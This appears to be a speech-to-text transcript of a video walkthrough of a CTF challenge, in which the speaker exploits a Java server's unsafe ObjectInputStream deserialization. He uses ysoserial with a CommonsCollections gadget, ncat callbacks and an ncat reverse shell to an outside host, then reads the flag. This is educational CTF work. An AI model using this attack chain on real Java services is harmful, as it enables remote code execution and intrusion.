 What's going on everybody? My name is John Hammond and welcome back to their all-army cyber stakes or ACI CTF video I want to be showcasing one of the challenges from the binder exploitation category that didn't have a whole lot of solves This is serial killer for a hundred points in the bin X category currently only has 39 solves It's Saturday at the game ends tomorrow night. So we'll see if that gets any more But this is called serial killer challenge source. We're giving the source code here. So let's download that I'm gonna go ahead and make a directory for me to work with in this I will hop over to the ACI directory that I've been working with and I'll create a directory called serial killer We can go put that in there and W get that file down. Okay. It's also listening on this challenge host and port Okay, we can also connect with this little little client. Let's W get back down as well Okay So if I were to Java tack jar that notekeeper client because it is a jar file I'm assuming this is all written in Java We can go ahead and connect to that host on that port So it needs those as arguments. So I'll supply that host and I'll also supply that port There we go connecting the server there connected to welcome the notekeeper client version 1.42 We could print all the notes add a new note and exit this program. Okay. I will view the notes We have test. This is the main content Shopping list milk eggs and sausage bills. Don't forget to pay the bills do on the 11th Interesting if I add a new note, can I say? Please subscribe body like comment YouTube algorithm Good enough and let's print all the notes. There we go. Now. I have my note in there Okay, that seems to be the all the functionality this program is willing to give me so let's take a look at the source code Let's unzip that serial killer source. I have the client note and server So let's take a look at the client and see what that was doing Importing all these Java classes IO exception object input stream and object output stream. That's kind of peculiar It's local OS IP addresses. You can just apply that Read in the arguments as specified read in every line Connect the server connected good good good and it will display these out to me So it will create a new object input stream new object output stream if We supply some of these things will include a get interesting and it will Have that banner displayed and reach all those out Same thing if you wanted to create things on it will save as needed. Okay Interesting Let's take a look at our server Java util array list object input stream object output stream as usual server socket system and common collections for Collection utils that's peculiar All the notes that are in there by default it adds these and then the server loop will read in input with object input stream This plays out. So it'll only write objects if they include that get or save prefix but We could just very easily netcat to it and send that ourselves could we not we don't need to use that client Let's try that it's not going to send us any banner or anything Hello Okay, that makes it die If why you sent that by string does it exit properly no get no stream corrupted exeception Valve stream header at input stream Okay, so it's using object input stream to read that in an object input stream is kind of like a known bad Java deserialization issue right Java deserialization Object input stream That's a thing Yeah, deserialization of untrusted data. Oh wasp has a good article on it Java object input stream Most likely to be seen in custom code reads an object from an untrusted source and cast it to an object Hack me object Occurs after the deserialization process ends. It's not preventing anything Okay, so object input stream is going to deserialize something and whatever we send it right and That's happening based off of just our raw input So we don't need to if we're trying to attack this with the Java deserialization attack and the challenge is called Serial killer right we shouldn't need to care about this whole client if we just want to send it a payload We could use why so serial to be able to do this So if you haven't heard of why so serial it's a proof-of-concept tool for generating payloads and exploit unsafe Java object deserialization I've used this a bit for Java RMI attacks and it has a bunch of payload types based off of anything that we might already notice and In fact because we found common collections for Common collections for as an option in here and maybe we could go ahead and beat this thing up They use Java attack a jar with why so serial to be able to actually get a payload in here If you want to send a payload would like a Java RMI exploit you can use Java tax EP So let's generate a payload and try and send it right We could very well just download this They have releases here. Yeah Can I download that zip why so serial 0.5 is that the latest? I guess that's the latest. Let's try it. Let's get to our shell Let's W get that guy down slap that in there. We go unzip that 005 a lot of why so serial in there. Do I have why so serial dot jar? No, oh source source There's got to be some releases that actually have the binary They have a Installation down the latest from jitpack. Gotcha. There we go. Okay. That's what I actually want Let's go ahead and grab him copy link location Let's clear out that why so serial source and the zero zero point five because we don't need that We just want the jar file Take a little bit of time to pull that down But we could see if we could get code execution Maybe see it connect back to us because this is out living in the Outside internet. Let's create a little droplet John password Good good good Now we have that why so serial master here. Can I run that why so serial? Yes Okay, so it'll tell me all the options that are available and according to the syntax We can specify the payload type that we want. We know that we're gonna be up against common collections for so we could certainly try that let's use common collections for and Needs what we want to run after it So let's try to net cat Or like ping at the very least John Hammond org Will that work? Why did not work? Master snapshot Does that make a payload let's try that to go to a payload That doesn't seem to work payload is now an empty file Okay, are there other versions of this because master I always have an issue with master snapshot master Try and get me Multi-arg does that one work multi-arg? That's a thing. Let's get that guy in there. Okay. Now we have multi-arg jar Is that file I can download? Yes, it is Maybe multi-arg will behave. I Always struggle with why so serial stuff now. We're downloading multi-arg. Let's try and listen for pings. So pseudo TCP dump tack I Or just I don't care ICMP search for any pings that I get TC P dump not TC dump. There we go. Just as a sanity check. Let me ping myself Good we see it. Okay. Oh Nope didn't mean to close that now that we have multi-arg. Let's try and Java tack jar That one See if he behaves. I need the common collections for did I just have that like spelt wrong or something commons collections I must have had that wrong Yeah That's probably exactly why it didn't work Or not who cares? Let's just use multi-arg with commons collections for and let's say ping Okay, cool. Now. It's gonna try and do stuff. So ping John Hammond org That gave us some raw bytes so we can redirect that as a payload Great. So now hex edit payload payload is a serialized Java object that can be abused and because it's using that common collections for according to our server source code and using that input stream to read it in it will go ahead and actually De-serialize it. So let's try to Netcat back to that guy as we had before but let's cat that payload in and See if he's gonna ping. Nope seemingly not Okay What else could we do? Let me check the hints here. Honestly. Let me transparent here You need to run the client with Java. Yeah, we knew that use client to connect the server Java 8 Make sure you read the source and cat is installed in the target machine. Oh, okay Can we end cat? John Hammond org on quad 8 So let's listen that cat quad 8 Send that in and we get a connection. Okay, awesome. Okay, so we do have code execution. Maybe ping was just a bad call Regular net cat doesn't seem to just straight work. Does it? Oh It does Well, that would work just fine then. Well, if we have an end cat we could use The tacky and get like a shell bin bash And let's listen one more time get that to call back and Spit it over there. There we go ID Nice. Okay, that's code execution. Excellent. So let's go ahead and Do that one last time just so you can get the shell and see clearly that flag dot text There we go So that's all that you needed to do. I always struggle with why so serial. I don't know why it's very very sensitive and using like Double quotes or quotes around the command that you're trying to run makes it misbehave So I haven't seen that work Maybe that will work now that I've just been talking about it, but let's spend that one more time No, it will fail if you have quotes in there even for multi-arg and I know that there are like two different representations between using multi-arg and using master so if I were to switch this to go run with the master version of Why so serial it just doesn't take that at all Maybe I could use quotes in here and That seemed to have aired but payload is still empty. So that doesn't work whatsoever either so the syntax that I ended up using was using the multi-arg version of Why so serial using common collections for because we knew that was in the source code and that's what it's using and Using end cat without quotes to be able to actually get the code execution in there and redirect it to a payload file LS Payload is in there now with contents so I could send that payload file over to the challenge itself It will deserialize it instantly but upon getting that and I could run commands and find out who I am and cat that flag So that's that challenge I don't know a lot of people haven't solved it and I guess I because of struggling with why so serial I hate dealing with that in Java, but that is that challenge. So That's all that I kind of wanted to showcase I've used your why so serial a bit before for Java RMI attacks But it's kind of a well-known thing especially if you're doing some serialization deserialization why so serial is they just to go to especially for Java so Thank you guys so much for watching if you guys like this video Please do press that like button if you'll be willing leave a comment. Maybe some constructive criticism Hey, John this video sucked stop doing them I Wouldn't faze me. I probably would just keep doing videos, but subscribe if you're willing I'd be so so grateful if you want to support the channel in other ways. There is a patreon and PayPal link in the description. Thank you Love to see you on the discord server also link in description It'd be great to see you on Instagram for some reason PayPal as I said Twitter LinkedIn Twitter and LinkedIn I'm trying to grow I'm trying to get a lot more Twitter stuff And I'd be great to see you guys on LinkedIn because we're doing good stuff here Thanks for watching everybody. I will see you in The next video. Take care